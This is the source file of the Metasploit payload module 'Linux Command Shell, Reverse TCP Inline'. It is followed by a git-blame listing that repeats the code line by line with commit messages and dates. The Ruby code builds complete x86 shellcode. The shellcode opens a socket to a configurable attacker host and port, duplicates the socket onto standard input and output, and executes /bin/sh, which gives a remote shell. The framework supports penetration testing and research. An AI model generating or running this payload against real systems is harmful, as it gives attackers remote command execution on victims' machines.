modules/payloads/singles/linux/x86/shell_reverse_tcp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 68

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => ['Ramon de C Valle', 'joev'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix
    ))

    register_options([
      OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])
    ])
  end

  def generate(_opts = {})
    # pad the shell path to a multiple of 4 with slashes
    shell = datastore['CMD']
    remainder = shell.bytes.length % 4
    if remainder == 0 then remainder = 4 end
    shell_padded = ("/" * (4-remainder)) + shell

    "\x31\xdb"             + #   xor ebx,ebx
    "\xf7\xe3"             + #   mul ebx
    "\x53"                 + #   push ebx
    "\x43"                 + #   inc ebx
    "\x53"                 + #   push ebx
    "\x6a\x02"             + #   push byte +0x2
    "\x89\xe1"             + #   mov ecx,esp
    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
    "\xcd\x80"             + #   int 0x80
    "\x93"                 + #   xchg eax,ebx
    "\x59"                 + #   pop ecx
    "\xb0\x3f"             + #   mov al,0x3f (sys_dup2)
    "\xcd\x80"             + #   int 0x80
    "\x49"                 + #   dec ecx
    "\x79\xf9"             + #   jns 0x11
    "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + #   push ip addr
    "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + #   push port
    "\x89\xe1"             + #   mov ecx,esp
    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
    "\x50"                 + #   push eax
    "\x51"                 + #   push ecx
    "\x53"                 + #   push ebx
    "\xb3\x03"             + #   mov bl,0x3
    "\x89\xe1"             + #   mov ecx,esp
    "\xcd\x80"             + #   int 0x80
    "\x52"                 + #   push edx

    # Split shellname into 4-byte words and push them one-by-one
    # on to the stack
    shell_padded.bytes.reverse.each_slice(4).map do |word|
      "\x68" + word.reverse.pack('C*')
    end.join +

    "\x89\xe3"             + #   mov ebx,esp
    "\x52"                 + #   push edx
    "\x53"                 + #   push ebx
    "\x89\xe1"             + #   mov ecx,esp
    "\xb0\x0b"             + #   mov al,0xb (execve)
    "\xcd\x80"              #   int 0x80
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00
Include cached size. 2016-02-18 20:29:42 -06:00			`CachedSize = 68`

worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`include Msf::Payload::Single`
This adds a Linux-payload specific mixin which allows for new advanced options, such as setuid/chroot prepends. 2007-06-09 02:25:31 +00:00			`include Msf::Payload::Linux`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`include Msf::Sessions::CommandShellOptions`
Added missing Linux x86 payload modules from unixasm 2008-10-23 02:19:50 +00:00
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Linux Command Shell, Reverse TCP Inline',`
			`'Description' => 'Connect back to attacker and spawn a command shell',`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`'Author' => ['Ramon de C Valle', 'joev'],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`'Platform' => 'linux',`
switched to x86 from ia32 2005-07-13 18:54:41 +00:00			`'Arch' => ARCH_X86,`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`'Handler' => Msf::Handler::ReverseTcp,`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`'Session' => Msf::Sessions::CommandShellUnix`
			`))`

			`register_options([`
			`OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])`
			`])`
			`end`

Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`# pad the shell path to a multiple of 4 with slashes`
			`shell = datastore['CMD']`
			`remainder = shell.bytes.length % 4`
Save some bytes on the padded string. 2016-02-18 20:36:52 -06:00			`if remainder == 0 then remainder = 4 end`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`shell_padded = ("/" * (4-remainder)) + shell`

fix continuation warnings in payloads 2018-05-01 04:57:42 -05:00			`"\x31\xdb" + # xor ebx,ebx`
			`"\xf7\xe3" + # mul ebx`
			`"\x53" + # push ebx`
			`"\x43" + # inc ebx`
			`"\x53" + # push ebx`
			`"\x6a\x02" + # push byte +0x2`
			`"\x89\xe1" + # mov ecx,esp`
			`"\xb0\x66" + # mov al,0x66 (sys_socketcall)`
			`"\xcd\x80" + # int 0x80`
			`"\x93" + # xchg eax,ebx`
			`"\x59" + # pop ecx`
			`"\xb0\x3f" + # mov al,0x3f (sys_dup2)`
			`"\xcd\x80" + # int 0x80`
			`"\x49" + # dec ecx`
			`"\x79\xf9" + # jns 0x11`
Fix old comment. 2016-02-19 19:08:38 -06:00			`"\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr`
			`"\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port`
fix continuation warnings in payloads 2018-05-01 04:57:42 -05:00			`"\x89\xe1" + # mov ecx,esp`
			`"\xb0\x66" + # mov al,0x66 (sys_socketcall)`
			`"\x50" + # push eax`
			`"\x51" + # push ecx`
			`"\x53" + # push ebx`
			`"\xb3\x03" + # mov bl,0x3`
			`"\x89\xe1" + # mov ecx,esp`
			`"\xcd\x80" + # int 0x80`
			`"\x52" + # push edx`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00
			`# Split shellname into 4-byte words and push them one-by-one`
			`# on to the stack`
			`shell_padded.bytes.reverse.each_slice(4).map do \|word\|`
			`"\x68" + word.reverse.pack('C*')`
			`end.join +`

fix continuation warnings in payloads 2018-05-01 04:57:42 -05:00			`"\x89\xe3" + # mov ebx,esp`
			`"\x52" + # push edx`
			`"\x53" + # push ebx`
			`"\x89\xe1" + # mov ecx,esp`
			`"\xb0\x0b" + # mov al,0xb (execve)`
Make x86/shell_reverse_tcp's shell path configurable. 2016-02-18 20:24:30 -06:00			`"\xcd\x80" # int 0x80`
worked on payload encoding, exploit driver wrapper, platforms updates, spoon would probably hate it 2005-07-13 18:06:12 +00:00			`end`
Added missing Linux x86 payload modules from unixasm 2008-10-23 02:19:50 +00:00			`end`